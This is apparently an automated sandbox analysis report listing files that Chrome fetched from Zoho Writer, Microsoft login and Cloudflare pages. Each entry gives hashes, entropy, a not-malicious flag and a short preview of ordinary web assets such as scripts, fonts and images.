                                                    Preview:..var isV8Engine="undefined"==typeof window||"undefined"==typeof navigator,_stopPagination=isV8Engine;if(isV8Engine){var isMetaCollectionDirty=!1;window=this,docsComponentjsSource="",docsComponentjsSourceSRI="",docsComponentcssSource="",pasteHtmlSanitizerJs="",calendarWidgetJS="",extensionCommonCssPath="";var jsCdnZWStaticPath="",getFingerPrintFilePath=function(){return""}}var U=_.noConflict();window.isHeadlessPDF=!(!window.editorProps||!editorProps.isHeadlessPDF),window.isHeadlessHTML=!(!window.editorProps||!editorProps.isHeadlessHTML);for(var CONST=JSON.parse('{"MERGEFIELD":"mergeField","NEXTRECORD":"nextrecord","SKIPRECORD":"skiprecord","TOC_PREV_PARA":"tocBr","TOC_MAIN_DIV":"toc","TOC_REGENERATE":"tocRegenerate","TOC_CLOSE":"tocClose","TOC_SETTINGS":"tocSettings","ZERO_WIDTH_SPACE":"&#8203;","ZERO_WIDTH_JOINER":"&zwj;","ZERO_WIDTH_NON_JOINER":"&zwnj;","PG_SPLIT_NODE":"pagesplitnode","PG_SPLIT_LAYER":"split-layer","PG_BRK_LAYER":"pagebreaklayer","FN_LAYER":"footnoteslayer","FIELD_TE
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):3769702
                                                    Entropy (8bit):5.6389457836545125
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:566A7D9DE9D70DB94DEFF9620CFF5CE6
                                                    SHA1:2B884DBA52C1926E48CC94A15B080A8002DDE008
                                                    SHA-256:D789A9DBA10E2B0C2961122120DE148D863C794BE22A0D383779A84E2CDAD122
                                                    SHA-512:C078EA1822E962F4513060DE76203AF1F41BC2309B5DF228C50DC66F7E07D6C8AE1A6D759EF967F2C35B3D7B08CFC67FEF184D643DF892B5E70837F6304837F5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:extend(editor,{textLimitKeyBinding:function(e){var t=editor.jeditorPane[0];e?editor.unregisterEventsInDom(t):editor.getRole().permissions.can("document.edit")&&editor.registerEventsInDom(t)},registerEventsInDom:function(e){e.ownerDocument.addEventListener("compositionstart",EventHandler.handleCompositionStart,!0),e.ownerDocument.addEventListener("compositionupdate",EventHandler.handleCompositionUpdate,!1),e.ownerDocument.addEventListener("compositionend",EventHandler.handleCompositionEnd,!1),e.ownerDocument.addEventListener("textInput",EventHandler.handleTextInput,!1)},unregisterEventsInDom:function(e){e.ownerDocument.removeEventListener("compositionstart",EventHandler.handleCompositionStart,!0),e.ownerDocument.removeEventListener("compositionupdate",EventHandler.handleCompositionUpdate,!1),e.ownerDocument.removeEventListener("compositionend",EventHandler.handleCompositionEnd,!1),e.ownerDocument.removeEventListener("textInput",EventHandler.handleTextInput,!1)},bindCaller:function(){Pub
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):61
                                                    Entropy (8bit):3.990210155325004
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):3452
                                                    Entropy (8bit):5.117912766689607
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CB06E9A552B197D5C0EA600B431A3407
                                                    SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                    SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                    SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.live.com/Me.htm?v=3
                                                    Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 205828, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):205828
                                                    Entropy (8bit):7.997415363915971
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:EB8D5C5CF8BD135A7C08569614F58DBF
                                                    SHA1:648D6DD0C929183C19C940DF188379414484665F
                                                    SHA-256:1A518E8C74D198B01B30D969E4E5270E04CCF1B4A99B1356A73F8C068ADBB348
                                                    SHA-512:312CA4CFAA9C2C302D67DF37F5D08387785DC72BC050A0AAD895870EFAD2C7210733D6B4B49F1EEC760C031C2D8921CFC6D49E9B3AADA1A2489E7DE8523FBE88
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2thin/font.woff2
                                                    Preview:wOF2......$...........#...............................l.`..&..f........D..n.6.$..<..@.. .... ..9[.....T.+..$.<..GX.e.9.c.9....9,..@...?A*..4.Z...)...........}w.\..1..`.K.g.X..!&..D.,~..................................,.qZ.#.+.v..I!)....g.(..#.X..$..t&..uy%.eE.0_.+..Vo(...v`p(..p<..U.....Z>.....K.q7>!.....!.u..T.u.......&>..E....!..g.-"/ffS..R.....Y.B..e...`.-.Q..X.^..:.....2.lHIb.c/V.P..c.@lz>q*S..Z(g.wb8.j.=..h{.Fv$n.h...(K.J....g.P.&..(.....dtD5a'p.)wpL..bB.n.j".l;ik.....)aq.L*...4....'*lE....S...f..._../....eW.L.c..T.].f....{cM\......q.l>8.\.),S..~.pn#..H....[sG......fn..w.1p......f.....G...iE..*...i...y./..5.2.$............%f.LS.Y(S(Sq0$-&.....Q..a.....e....0.. .91u?..P..$?i.,.W.1)........C..TE.,....x...%..GF.F.s.QTX.D.BY.D..?..bJ.. eq..C.Y...S(..~......L......mSg.r.....<.1K5.+w..\,..'."B:MUIS.x.!.f..\G...sG....}Z....d..h.......(7....E$.q..F...u....X(s.".u.y.X.d..b.t...,,.V.>'.H...B...Y.n...Rx>n..e[..*,.2.G.......pX...mX.PfmM....3......8..x..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 426 x 599, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):141663
                                                    Entropy (8bit):7.9910296708758795
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:ED89CDE83F4950D1F9F9EF2129ED6F66
                                                    SHA1:F29BFD4E1D24DB286DCD8E9FDE6B068F3C14E05F
                                                    SHA-256:8BFA516642DE3F8EAE32E49242BE75CB03C2B751149A7708D0E63F55302353C8
                                                    SHA-512:25984EF02D0457FB6F4B6B08DD1F526C4156474CB235BF2E765278F96845F803C3459C2AF37E0CE44CC3A1FF1A0BF669A61DC3A57803BF1DDE92948196722EA0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/images/writer-icon-lazy-sprite.ed89cde83f4950d1f9f9ef2129ed6f66.png
                                                    Preview:.PNG........IHDR.......W......k......pHYs.................sRGB.........gAMA......a...(.IDATx..].|........ZP..e........V.O<..[..m...mm6..j.lZ.x......O< .V.`.E.((..%!.............fA..~....o..}.......0.!.a..1..7.:p.(.v8.....m3+.....-....[9....Z.......A...;.. T.[87....Y?.2.......L./{dn..a.9........CH..I=..g.y%V...t.\.B.g.q.....h.Ue.C..'M=...-*...Z....s...Co.-c...t2\....CL;.N........T1..`JK.?l..m....1...s..-7^yi..D....M.'HuK...Y.)-.vu..7+d......{q.. |O.w..$1.a...{.f.O.5....BY.....f..m....A...'..z.%`.[../.A..5*..K..;%...0......Z..|..5'..]7W.....n.]....hRA..4..}....=.O.....4.t.].D,n.+..........Bb..E....+c.|j.$....J.C.h.!v..W..;....'xA.z......"....Z....q..]...`c.oT>B..X...._ ...p.s...]......W..u..F.1Ah....:..3'..H+5.D&.A....on..v.....L..VC.+ua.(..l./.d.V.r....g...U....f*#.D4.{ga......61.=.WdJ...Y`{.A...Z..14B...e{:...W.2.ff.#dr|....B..,._.o..#i-Gb(7(..*.........N. .@..."d..(.b5d.I`Sp_..Q...D./..._.p~.........l..U.HR~..!Y...........NR.}.\.....Drt... ..FA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 35682
                                                    Category:dropped
                                                    Size (bytes):9515
                                                    Entropy (8bit):7.974041220145355
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F93D6755A627088AD0D6F3DEEE5C7AF9
                                                    SHA1:6453CD7F4AA3358E65009476394DC9C5751CD058
                                                    SHA-256:0971B625003003FE233F992A7F4E9334FCD6C4107563403CCBD970876254DDDF
                                                    SHA-512:F6E62DEC6F71B85049C4B65CFD01F97DC55E599C5B55498E7729DD0E6EB08CD983BED992B95DFB1A236F51A1614322339916586869257B7CBCF885A5B141BCBE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........}is.F.......M^C4.....e.......)V..!!"...J.H...F..F....[u].H.z....|._{.Q.K....rz...r.^9....w..<.S.t|...h.qpR...".0.s.>..q.$...J..$]&).y.,.o......B./..L..9.3e.e9t..<.V.0\....7......0Zt...&...~.+q.G.+$fb.9<..WV1.r}.....I....r.+.$[Ays.U!)W2.+a.....c..[.Q31M1c&...W...C.(.....A\..i...q..j0.....'.M.....s....<X...@`+...hf<.B..s%.."..!........F9OI.$/.......s...E..F..K.D`.*<....b..(..R....,....244....}M..U.y..&._.G..*..d.%..9..tz....8=...{Vt....D9Y.....Y.(..:.S.c..'%....e.'...O......2..b..t.%.....-.=eww..6./W...._...[[w'.*.......n....4..#5..m...T...H..a.......Ow......3..}.X...>...>....F.4.....p.+..z1%..<.qT...(M....z9M.'.u...4...7(:L9.Y.}?.Yr.....#..0a<S....T'...z..?...Qo.....4...b.<...t.....%O.......cQ..z.}.-....i..@.%V..4T>.yA.|.....c.,..!<.+..I0..}.,Q..._E.F\.~..U........j.....C.\...<...Yr.c.c...\p..h.1......V.+.....E...<^-..|......^pz..<$1Io..l..?..8.g..B~....7.;.rz.\.O..$."!.1./._.....'(.:LP?.Q.e....#.......rMR....,.....V...g.fhH..
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 981
                                                    Category:dropped
                                                    Size (bytes):542
                                                    Entropy (8bit):7.5641293776931215
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7569D6C5B45AB123E5B8150BB2B3BF22
                                                    SHA1:3BE25A250F736FF3B3D809466659E3422C0A3B1B
                                                    SHA-256:AA5FEBD7CE526B29249A3D558B4D0CE0021BB4338EE729AD6377A6BE2DABCA3E
                                                    SHA-512:CF6721B1B8647705FEF5D18B6A3B0CF7474C3E8667F14C1A013782DD3B21EBB08F6E32052A34B8554FCAA9FC83AF4748EE29ED078AE98154DD047B979A350BD2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:..........uS..0.....J0x|w.....@.(q.*......;.ZU.....3W.j._...0.5....P........Z..yI..$......K...r.....f.....[.....u....x....:..r.._.....5...d..pM.f.2.|s9?..p.iP.sRi.-(.V.V...2..t.i.....`.$.X H...!(...W..[.. .<aJ*@..#.i....h.Z....!'2;Rm..0.`..W.FF..O.......'&....B.oi..:....T...'..j$p..Oo'bc.,......8z$...E...N..X......F..E.b+Hnb*B.k...<.3?O..'...<a....R..G.....8%...%q.,M.S...TT...|....F.D.(.RS.F)PF..t...C.w.].a...th.m1...f....|f.*.9%....C86...*..C.....,.4...}..0....s3..i..l.C......li.!..W......9\..&.x.......u....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):91
                                                    Entropy (8bit):4.153169219022396
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C1A23D31A9ED3D42EBEB7FDD5B4ACF53
                                                    SHA1:29FDAD9490FA4AFE29EBEADD152616DC40D1F71B
                                                    SHA-256:EB9F3182CC6C0D3BA5357E2E69892E2EC9DF159B0292D2F44A1CBACE595F7DCD
                                                    SHA-512:BCF656EE7386F870A3AD28C6D638E3BBD92BECAAC5B1B30D82B8536ECA57D075DBA7EBB96EB61327DD2EB3E74A9FB8540081F73400520426AD96BEC55D68024E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:Error occurred while processing your request. Please write to us at: support@zohowriter.com
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                    Category:dropped
                                                    Size (bytes):1435
                                                    Entropy (8bit):7.8613342322590265
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9F368BC4580FED907775F31C6B26D6CF
                                                    SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                    SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                    SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 163 x 109, 8-bit/color RGB, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):3469
                                                    Entropy (8bit):7.911410590357471
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4975B4E896F3B83F25C90CB4A032BA04
                                                    SHA1:DF5626D2EC0B90B07232D3E540C184BC37B74E9A
                                                    SHA-256:A28026E554686DC01A8F9D74E477375F0436F661B5B5CD8C769CBD3BA46943AA
                                                    SHA-512:980F5D67DEE92E0872F49A36B66A0281F0C35CE67787C27A67FE12722281E00BE5B0D0D67336A89E57C5EA9B39FC3089ECE0CFB940D1FFC20461B9917DCFA527
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://workdrive.zohopublic.com/writer/image.do?imgurl=r-p369v39db425d23f84b09b5751cf359b081f4-3d43e5ec14304470bce34af86f06025fnmdhm1m6kvt6&rid=p369v39db425d23f84b09b5751cf359b081f4
                                                    Preview:.PNG........IHDR.......m.....B.F....TIDATx..OK......\.}...7..x}.......\<+..w..:...)..rq%D..r,.P..U.).V..l..1E#.\.o}..4..Zm.G.1&.tf>.}.'.LD......pT..R....8iN:,-..zrMs.ai...k...K....\.tXZ ,......a.'.4'....K=..9.@X..5.I....RO.iN:,-..zrMs.ai....gk........P..-P=./...BUIW.t.^(.l.n.....z."]..X.<.*..3.yJ8...co./..!._.....#.d.....G8..........9..R..J.u=...fG..sb7;.9.rA;...~{..Z.zC....3..|..\.:[...3]..nv...Z.].....N="..D&......s.]9..m..f...-..t]..S.J7.P...$.. .fG..m!.o./..L.LX)#....C.7...J.0..m0*U%..s.<.P=~.Z.7i_...{7;.*.8.f.e.;......U.'.Z.7i].}.h....=>...b.....e5y....[]....+{t......N.!..P..w.Y`...ve[7.z.{......G$*F...>Qqv+.j......Y.;;.7.....W..BZ........g;..W...#.I.......j.....!.|...,..n....o.$../......p.^.%..._..N.$..:'m.......d.....Y.Z.s.U...y..7........f..].......>.....5.#{'.5..z../.k..f...4.. M..q.......nv......kC.>..N...#].}.........+~i...\.n.p.....Y.w...+*..i].......|u..:..cBqv+...X...y.+.-......2..Jt:NS..GI.;t4B..4..5.?.xt.F.2..}...F.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 215908, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):215908
                                                    Entropy (8bit):7.997836353678912
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:47F2D8B1608A8A3D11C843EE880E6B8C
                                                    SHA1:FCEE32457A0BDF2E07DF69155E77327FD42BE6F0
                                                    SHA-256:464A55EFFC5E4DB092186E6A86001EFD5EACDDD8BA30D311C458C9396C8DAD3A
                                                    SHA-512:A9542DD48EF674DE9054AF8481F945D1104DEB20727F821F0EDAEF2229151FF480EDACDBC13AEB5A4DCC8AAC447298F2E4B1D8C48DA5CDD16197EAD3304F375B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2bold/font.woff2
                                                    Preview:wOF2......Kd..........K...............................l.`..&..f........ ....6.$..<..@.. ..t. ..9[.7....i2.>..;.6..r*....%..@.~.b.............C.tWE..[2.t.....JlD....|.@)..e.............................&..k%.m..3...C.^xW!A.j.'~....j..x... .(.aZ=.....h&...I!./...@y...@.T..TA.6..^"&.6.u*...Z/\THX.U...W.B*"\...R.FxcY.5.P.....i/.T.dAITX..i..M^...x/.....=..v...6.yHU[)AC...Uid.....n......)..}>3...h.,...$8C..6..jRu..4...dYW...n...HIp..!hJ..:...P|.'A".Yl......R'5j8.h.....(....6..yTN!.'1.~.X....$...VZ.5...)9.{{..\3.A.. !ABM.1U..5..Y..XDA..pu`g3P.$,.v.B{T.^;....l.....,...-...CA:@iZ......:.VT..RR$d....=.(d.6..up.....(....L.I#.....(...Q~...q,..H....R$$....&>?.......3.,<.O.S.....:......e:.."...{..UPM.\.3...Q`*$..i..8[.h`..yV!|....Z.0.K.......H.HU.h.)..Y......[O.j[y.q.Q.I..q...........nk...%A..%..Ny.|Z.J...x.. ..f....A..s,^...oaJ.. .,..$d..7.r.r..^Q..,.D.E)L..&.'....z..]..zBA.%<5.../wL.q!..R...Y.tN.uJ.&k.djJA....H.L.Q...>m...7..|.T.l.hW..6..l..r&.....7...+>]...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PNG image data, 426 x 94, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):18039
                                                    Entropy (8bit):7.979950228439211
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CD2425DB86340F26DAC5ACCE76AE2E69
                                                    SHA1:5916011B51260BADB8C2F32341275A876C6660A2
                                                    SHA-256:78667200F01CE5AB577C9CDC423CB8493EA8E9106736641C5BB510631D29EAEB
                                                    SHA-512:47CAA77E86418991B28DAEAA2813911083226C27D09094F5C2B57C92655C8EDE29C76553CA9318E7B20017E036F1DB57B9E4CBF386668AA22AD1BDEAFA2BAAF9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.PNG........IHDR.......^.....r.PM....pHYs.................sRGB.........gAMA......a...F.IDATx..}...U..w...BG..".^eU:.w1..;..\.D4...s.O.................^wzDM..L`y.d......3Q..).)vA.>.y....;u..tu.z.'.X..L.S...N...:....!B....1...U..e.....9.{{/...9O.5.i.....1f..q.O%..5&..6.gcx.......[...j...2...\..D..0....?..-c^.>...v.4h.-1.Z.c.?tQ._...o=...0;..-........6..Z...S~...D`..Ia...y.....Po.^CX.nk+g._.C..;..y.e..}...8...qK7.......zG..A/....&0s-.-.C|r..x..q.zp...S..].d..a.-i$.".8gl ...Q..:4......&\..)......o`...X.....aU...~4Ov...Ff........4BeS..\.~..I...a.."(...nB..{.].n...m~./A...~...|......y..z...qp....K.tt_...../.{q.8 ..5^....iC.c&[.~[..Y....s......[.x.~..|..}..y.......=.C..U..z...n...X;.=i..W..?W. e.K...j.oP.....$..36#....C>..cJ.rm..`..7.....K.AV..$l......p..F....G.S...{..,.VPFT...FP.)`]S...`..]..h...[.8h....p.m?y.)5.R.>...D6.Cp...J..L....2...s...n~.,....FV6....@.R.c.R._P.R.HJ.....&Z.i-..e.c.........<...x......4.....0..v.m.o...-...6.Z....Z.JR...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                    Category:downloaded
                                                    Size (bytes):15086
                                                    Entropy (8bit):4.230016730871105
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:CC78777FB41EEC04A432F96D8192D5C1
                                                    SHA1:70DE1826A2CA17C1BE8184EA9DD5F0911678FD6A
                                                    SHA-256:ADE637F2BF96E65EA9B759DCCBF115AAF72812DAEA5771687E634B4BAEAE2CCE
                                                    SHA-512:7E014F3E191F1E51243D0CA7547E5C91AD9B8834C2DE1CF83FB11CAA457ACB26DED88A4C72CAA42BE4BCAE4F6DD5312F268EEF5E4D8D98EB848EF5A3F1B7E424
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/writer3/images/common/product/writer/favicon2x.cc78777fb41eec04a432f96d8192d5c1.ico
                                                    Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.............................................................................................................................................................................................................................................-...A...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...C...<... ...........................................................-...........................................................................................................................................d...............................................].......................................................................................................................................................'...................................[..................................................................................................................................
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), CFF, length 59724, version 4.0
                                                    Category:downloaded
                                                    Size (bytes):59724
                                                    Entropy (8bit):7.996069634550882
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:2442199A236FDE3E5439F4D3D8A58DA6
                                                    SHA1:AEB60E05579AE47D72750E074E9CDCE94CB86018
                                                    SHA-256:4C572C9BC44F0180718999AD4B7B1729ECADEB2272DC10ACC4656A5C970D4023
                                                    SHA-512:580775BC30A17130719C2CAD35B0F5513EFFE6052CAEE997ECB137D680F023B0C3A6897352C6198485ACFC5826E30E199B64DD08288380E1C331BFFBEEABE32F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/zohofonts/zohopuvi/4.0/Zoho_Puvi_Regular.woff2
                                                    Preview:wOF2OTTO...L......................................F.. ...T..*.`..X.6.$..8...... [..q$..Z...M.Z.0.~.......,.MUU.P...j.m..-..~.......".........P.W......x..41y.ch^jM....v....Q!L..7..].\V....L.Kb.'.r..z[....W..t.{.hf.._.;.0....s..g._..\.v..*.....].....$..$n4...a3.....*Q........{6...e^...W44...4x...}...sz.,....J.. ..".p.DF.bZ."^......d...'.<...z.......!......c...@........g!Uta..C. ..?...C..-p..q.k`...S.....4F..#.2.......Q..{.....I......p..+ODD./"".""...^ji..gZf......c...Y..5..k..6.y..?..L...].Va..].O....bfU...b..%...5.[.>...#..IL.&X..4h!.Y.|JY.... .........$U...'..K.YQ;."....-.ec....(..DO`...1.B.q.Ed....ry.5...L. ...u.?q...;k.l..3.$..........#G.<I ..'.`.f.........{......$....D%D.t(a3Z.3.$Q.!...^..W._.....y.i...,S...q.5..M....b..V...X:v..RS("M.T{.![..!.-.<..E........x...y.+......7....{.]..'.o.u.E.8!D.M.s.....*./b....i.. ..A...%...........~.m...UVn...b.4R.X#........r..$.D..$...."...@.....D...!......D......:G..d.U..&D....1.l."W.:..[q....
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):72
                                                    Entropy (8bit):4.241202481433726
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9E576E34B18E986347909C29AE6A82C6
                                                    SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                    SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                    SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Web Open Font Format (Version 2), TrueType, length 205688, version 2.983
                                                    Category:downloaded
                                                    Size (bytes):205688
                                                    Entropy (8bit):7.9981286190048415
                                                    Encrypted:true
                                                    SSDEEP:
                                                    MD5:D6CA933F4FA09B8CFB6B667E150AC26F
                                                    SHA1:E6027628BA3982DDD5B0D0FA747E74E37AB09F61
                                                    SHA-256:A147A66C38FDD9B1654B81520E7246CA0BBFE1C3C164862CAFB74E875ACEC9CD
                                                    SHA-512:F0D2F7159A76A24C7A486139FBA9A37496DE739CFAEB87C7A2767C9438AFF739307A1A6EC3719F0F05BB85AACB5476CDA45E0D9C634E4E04A9E5EC1F64A9AAC4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://static.zohocdn.com/webfonts/lato2black/font.woff2
                                                    Preview:wOF2......#x......^8..#...............................l.`..&..f........ ..\.6.$..<..@.. ..&. ..9[....S.....Sk...r..8u.....4.....7.d..%...$B..w...t.(.[.K.."W...u.P:d.......b.].................................$.p.to..v..r..... $AZ.n..6.0..qI.2d.8..d.o)...dy9..Y*7k...j...N.a%.,Uk.-...R.7\V\...uB.]...Q3........CB.t.n....A.....1|...&.P#2...wZ.0#T7..0#d.f....Rhx....a...Z>n'PEk..f.4l...S&...Y....6{.j...&...u|..GB..B=F...X.f..t.j$].HSC....4..$.e.R\]6;1..hh....\0B...wj.J........+....R7[....M..(.XC...F.S.a.7.......dl.m.r$n..Z@+..M.9..9j.%MV.<.Sd].e.|.L.m..i...k.K...m.S.%..J2...2P2P.....l.2...x....I.H.)(.9,.....vs.@a...D..5.rx.'..r`b....B.N.f..(;iE.B...eB....6.)\...g..e.. CY$$H..2Q1..W=...VmGK.rYdI.(..8C.......C!U..i$i(8..?.'.V....%.Q.@...%.I_.fK...=......=....A).v....*.......$...!..42X..S.I...s...g.J3.E..y..V...."6.P....Et...........*.24..FE.<kW....2..U=.J...!.._.O...p..Q.....D%SS.......\..^.*..v..S{..W.k9h......@lXX.t_2\.U.........Z....z-.....h...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (424), with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):424
                                                    Entropy (8bit):4.830425022974208
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1422364EF1251002B035F7DFF017BB62
                                                    SHA1:7F236A317444AEF8BA9654B43CF52F129A0D907A
                                                    SHA-256:3BD89F8F0CE586EE0ACB0D4FB97B894CBCA8F703AA25F30EDDEA09CBC22122DF
                                                    SHA-512:D349DAF08906480B3EFDC572DB3D197803ECD18ED25B12ECEBA4A62FDFB04DE8AD4200A2A7729758DB16C293CC66547DD02F62A0833314991613505ED6625847
                                                    Malicious:false
                                                    Reputation:unknown
